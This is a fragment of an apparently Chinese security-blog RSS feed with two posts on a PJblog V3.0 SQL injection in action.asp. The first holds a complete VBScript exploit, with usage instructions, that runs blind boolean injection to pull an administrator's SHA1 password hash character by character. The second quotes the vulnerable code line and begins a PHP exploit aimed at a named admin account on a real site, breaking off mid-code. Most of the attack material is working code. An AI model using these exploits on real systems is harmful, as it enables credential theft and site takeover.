<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">Function</span> <span style="color: #000;" onclick="jssc.active(this)">bytes2BSTR</span>(<span style="color: #000;" onclick="jssc.active(this)">vIn</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">Dim</span> <span style="color: #000;" onclick="jssc.active(this)">strReturn</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">Dim</span> <span style="color: #000;" onclick="jssc.active(this)">I</span>, <span style="color: #000;" onclick="jssc.active(this)">ThisCharCode</span>, <span style="color: #000;" onclick="jssc.active(this)">NextCharCode</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #000;" onclick="jssc.active(this)">strReturn</span> = <span style="color: #900;">&#8220;&#8221;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">For</span> <span style="color: #000;" onclick="jssc.active(this)">I</span> = <span style="color: #a36;">1</span> <span style="color: #00f;">To</span> <span style="color: #000;" onclick="jssc.active(this)">LenB</span>(<span style="color: #000;" onclick="jssc.active(this)">vIn</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">ThisCharCode</span> = <span style="color: #000;" onclick="jssc.active(this)">AscB</span>(<span style="color: #000;" onclick="jssc.active(this)">MidB</span>(<span style="color: #000;" onclick="jssc.active(this)">vIn</span>, <span style="color: #000;" onclick="jssc.active(this)">I</span>, <span style="color: #a36;">1</span>))</div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #00f;">If</span> <span style="color: #000;" onclick="jssc.active(this)">ThisCharCode</span> &lt; &amp;<span style="color: #000;" onclick="jssc.active(this)">H80</span> <span style="color: #00f;">Then</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">strReturn</span> = <span style="color: #000;" onclick="jssc.active(this)">strReturn</span> &amp; <span style="color: #000;" onclick="jssc.active(this)">Chr</span>(<span style="color: #000;" onclick="jssc.active(this)">ThisCharCode</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #00f;">Else</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">NextCharCode</span> = <span style="color: #000;" onclick="jssc.active(this)">AscB</span>(<span style="color: #000;" onclick="jssc.active(this)">MidB</span>(<span style="color: #000;" onclick="jssc.active(this)">vIn</span>, <span style="color: #000;" onclick="jssc.active(this)">I</span> + <span style="color: #a36;">1</span>, <span style="color: #a36;">1</span>))</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">strReturn</span> = <span style="color: #000;" onclick="jssc.active(this)">strReturn</span> &amp; <span style="color: #000;" onclick="jssc.active(this)">Chr</span>(<span style="color: #00f;">CLng</span>(<span style="color: #000;" onclick="jssc.active(this)">ThisCharCode</span>) * &amp;<span style="color: #000;" onclick="jssc.active(this)">H100</span> + <span style="color: #00f;">CInt</span>(<span style="color: #000;" onclick="jssc.active(this)">NextCharCode</span>))</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">            <span style="color: #000;" onclick="jssc.active(this)">I</span> = <span style="color: #000;" onclick="jssc.active(this)">I</span> + <span style="color: #a36;">1</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #00f;">End</span> <span style="color: #00f;">If</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">Next</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #000;" onclick="jssc.active(this)">bytes2BSTR</span> = <span style="color: #000;" onclick="jssc.active(this)">strReturn</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">End</span> <span style="color: #00f;">Function</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">Function</span> <span style="color: #000;" onclick="jssc.active(this)">IsSuccess</span>(<span style="color: #000;" onclick="jssc.active(this)">PostUrl</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #000;" onclick="jssc.active(this)">strData</span> = <span style="color: #000;" onclick="jssc.active(this)">PostData</span>(<span style="color: #000;" onclick="jssc.active(this)">PostUrl</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">&#8216;Wscript.Echo strData</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">if</span> <span style="color: #000;" onclick="jssc.active(this)">InStr</span>(<span style="color: #000;" onclick="jssc.active(this)">strData</span>,<span style="color: #900;">&#8220;check_error&#8221;</span>) &gt;<span style="color: #a36;">0</span> <span style="color: #000;" onclick="jssc.active(this)">then</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">IsSuccess</span> = <span style="color: #00f;">True</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">Else</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">IsSuccess</span> = <span style="color: #00f;">False</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">End</span> <span style="color: #00f;">If</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">&#8216;Wscript.Sleep 500 &#8217;让系统休息一下</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">End</span> <span style="color: #00f;">Function</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
</ol>
</div>
<pre class="vb" style="display: none; background-color: #f0f0f0; border: #cccccc thin ridge;">If WScript.Arguments.Count &lt;&gt; 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) &lt;&gt; "/" Then
        attackUrl = attackUrl &amp; "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl &amp; "action.asp?action=checkAlias&amp;cname=0kee"""

If IsSuccess(strHoleUrl &amp; "or ""1""=""1") And Not IsSuccess(strHoleUrl &amp; "and ""1""=""2") Then
        WScript.Echo "恭喜！存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl &amp; " Or 0&lt;(Select Count(*) From blog_member Where mem_name='" &amp; attackUser &amp; "' And mem_password&gt;='" &amp; strResult &amp; Mid(SHA1Charset, i, 1) &amp; "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult &amp; Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) &amp; "Password(SHA1): " &amp; strResult &amp; Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) &amp; Chr (10) &amp; "Done!"

Function PostData(PostUrl)
	Dim Http
	Set Http = CreateObject("msxml2.serverXMLHTTP")
	With Http
		.Open "GET",PostUrl,False
		.Send ()
		PostData = .ResponseBody
	End With
	Set Http = Nothing
	PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
	Dim strReturn
	Dim I, ThisCharCode, NextCharCode
	strReturn = ""
	For I = 1 To LenB(vIn)
		ThisCharCode = AscB(MidB(vIn, I, 1))
		If ThisCharCode &lt; &amp;H80 Then
			strReturn = strReturn &amp; Chr(ThisCharCode)
		Else
			NextCharCode = AscB(MidB(vIn, I + 1, 1))
			strReturn = strReturn &amp; Chr(CLng(ThisCharCode) * &amp;H100 + CInt(NextCharCode))
			I = I + 1
		End If
	Next
	bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") &gt;0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function</pre>
<p><span style="font-size: medium;">用法：Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名</span></p>
<p><span style="font-size: medium;">from：<a href="http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html">http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html</a></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/1568/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PJblog V3.0 0day+EXP</title>
		<link>http://www.am82.com/houzan/archives/1566</link>
		<comments>http://www.am82.com/houzan/archives/1566#comments</comments>
		<pubDate>Thu, 23 Apr 2009 12:05:54 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[EXP]]></category>
		<category><![CDATA[Pjblog]]></category>
		<category><![CDATA[注射]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=1566</guid>
		<description><![CDATA[........]]></description>
			<content:encoded><![CDATA[<div><span class="Apple-style-span" style="word-spacing: 0px; font: 14px/22px Verdana; text-transform: none; color: #444444; text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: collapse; text-align: left; orphans: 2; widows: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0;">影响版本：3.0<br style="line-height: normal; word-wrap: break-word;" />信息来源：零客网安<span class="Apple-converted-space"> </span><a style="color: #505050; line-height: normal; text-decoration: none; word-wrap: break-word;" href="http://0kee.com/" target="_blank">www.0kee.com</a><br style="line-height: normal; word-wrap: break-word;" />Author：bink<br style="line-height: normal; word-wrap: break-word;" />漏洞文件：action.asp<br style="line-height: normal; word-wrap: break-word;" /><br style="line-height: normal; word-wrap: break-word;" />第14行:<br />
</span></div>
<ol>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #000;" onclick="jssc.active(this)">strcname</span>=<span style="color: #000;" onclick="jssc.active(this)">request</span>(<span style="color: #900;">&#8220;cname&#8221;</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">  <span style="color: #000;" onclick="jssc.active(this)">set</span> <span style="color: #000;" onclick="jssc.active(this)">checkcdb</span>=<span style="color: #000;" onclick="jssc.active(this)">conn</span>.<span style="color: #000;" onclick="jssc.active(this)">execute</span>(<span style="color: #900;">&#8220;select * from blog_Content where log_cname=&#8221;</span><span style="color: #900;">&#8220;&#8221;</span>&amp;<span style="color: #000;" onclick="jssc.active(this)">strcname</span>&amp;<span style="color: #900;">&#8220;&#8221;</span><span style="color: #900;">&#8220;&#8221;</span>)</div>
</li>
</ol>
<p style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="background-color: #f9f9f9;"><span class="Apple-style-span" style="word-spacing: 0px; font: 14px/22px Verdana; text-transform: none; color: #444444; text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: collapse; text-align: left; orphans: 2; widows: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0;">Exp:</span></span></p>
<p><span style="background-color: #f9f9f9;"><span class="Apple-style-span" style="word-spacing: 0px; font: 14px/22px Verdana; text-transform: none; color: #444444; text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: collapse; text-align: left; orphans: 2; widows: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0;"></p>
<div style="font-size: 10pt; color: #999; font-family: Courier New,Courier,宋体; background-color: #f3f3f3; border: #ccc 1px solid;">
<ol style="padding-left: 42px; list-style-position: outside; margin: 0px; list-style-type: decimal;">
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">&lt;?<span style="color: #000;" onclick="jssc.active(this)">php</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">/*</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">PJblog V3.0 0day exp</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">code by 小蟑螂&amp;bink</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">www.0kee.com    www.t00ls.net</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">09.04.22</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #090;">*/</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #909;">$url</span>=<span style="color: #f00;">&#8220;http://www.pjhome.net&#8221;</span>;    <span style="color: #090;">//注入地址</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #909;">$var_name</span>=<span style="color: #f00;">&#8220;puterjam&#8221;</span>;    <span style="color: #090;">//管理员</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #909;">$var_key</span>=<span style="color: #f00;">&#8220;check_right&#8221;</span>;    </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">if</span> (<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenI"</span>]){</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #909;">$LenI</span>=<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenI"</span>];</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">}<span style="color: #00f;">else</span>{</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #909;">$LenI</span>=<span style="color: #a36;">1</span>;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">}</div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">for</span>(<span style="color: #909;">$i</span>=<span style="color: #909;">$LenI</span>;<span style="color: #909;">$i</span>&lt;=<span style="color: #a36;">40</span>;<span style="color: #909;">$i</span>++){</div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">if</span>(<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenDo"</span>]){</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #909;">$StaAsc</span>=<span style="color: #909;">$_SESSION</span>[<span style="color: #f00;">"LenDo"</span>];</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    }<span style="color: #00f;">else</span>{</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #909;">$StaAsc</span>=<span style="color: #a36;">31</span>;</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    }</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
